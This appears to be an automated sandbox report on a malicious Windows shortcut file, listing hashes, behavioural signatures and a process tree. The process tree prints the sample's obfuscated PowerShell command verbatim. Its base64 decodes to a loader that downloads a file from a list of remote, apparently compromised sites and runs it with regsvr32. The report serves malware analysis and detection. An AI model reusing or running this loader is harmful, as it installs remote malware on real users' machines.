Analysis
-
max time kernel
14s -
max time network
19s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
20/11/2024, 16:18
Static task
static1
Behavioral task
behavioral1
Sample
6e92a1fbafbc5bee0a4a5babd4041cbfdd9241c1cf7bd7da8f6ff4a688a811f3.lnk
Resource
win7-20241010-en
5 signatures
150 seconds
General
-
Target
6e92a1fbafbc5bee0a4a5babd4041cbfdd9241c1cf7bd7da8f6ff4a688a811f3.lnk
-
Size
3KB
-
MD5
cf21b34c7584ffa2b1e8f045b3bf8b6d
-
SHA1
3b7043526a004d28b034621e3754a60d519e871d
-
SHA256
6e92a1fbafbc5bee0a4a5babd4041cbfdd9241c1cf7bd7da8f6ff4a688a811f3
-
SHA512
83cc7b098965ac35a70a764c68f95f290d9ec8d1ed8ff2f3dcbcaf61c17d36e662f98b6ef571fe8751721cc086ab1606bbb974c0aa437b963d17b164c8e91df3
Score
6/10
Malware Config
Signatures
-
pid Process 3004 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 3004 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3004 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2660 wrote to memory of 3004 2660 cmd.exe 30 PID 2660 wrote to memory of 3004 2660 cmd.exe 30 PID 2660 wrote to memory of 3004 2660 cmd.exe 30
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\6e92a1fbafbc5bee0a4a5babd4041cbfdd9241c1cf7bd7da8f6ff4a688a811f3.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2660 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "&{'xPej0Shc5xxIazh+qhMy4gypNEdzuvDoFuUQ1wVUyoiBRvl8Y/9PTxSfLdbv2o/CIeArC03Y';$jf='ICAgV3JpdGUtSG9zdCAiT1JqeXEiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oIm';$YFtXtU='h0dHA6Ly93d3cubmFrbGFmc2h0YWJ1ay5jb20vd3AtY29udGVudC9zRVhFWjlFYm1NNlRPRS8iLCJodHRwOi8vam9iY2l0eS5jb20vaW1nL1JNMFhwWC8iLCJodHRwczovL2JvbGVvLm5sL2Nvbm5lY3RvcnMvNjZQR09ERTFIaGF5NGUvIiwiaHR0cDovL3dpbmRzdXJmaW5ndGhhaWxhbmQub3JnL2FkbWluLzNoanltUlBlNGNSNGgvIiwiaHR0cDovL3d3dy52YWx5dmFsLmNvbS9wdW4vaFQvIiwiaHR0cDovL3dpdGh2YWMwMDEuZG90aG9tZS5jby5rci9hc3NldDMvc0xuRms4aUZVd1BBaTFtQWZRLyIpOyR0PSJaUHZaUG9EIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXGtCYk52emhKSXMud0pwO1JlZ3N2cjMyLmV4ZSAiJGRca0JiTnZ6aEpJcy53SnAiO2JyZWFrfSBjYXRjaCB7IH19';$rNJrM=$jf+$YFtXtU;$bIcdbg=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($rNJrM));$rNJrM=$bIcdbg;iex($rNJrM)}"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3004
-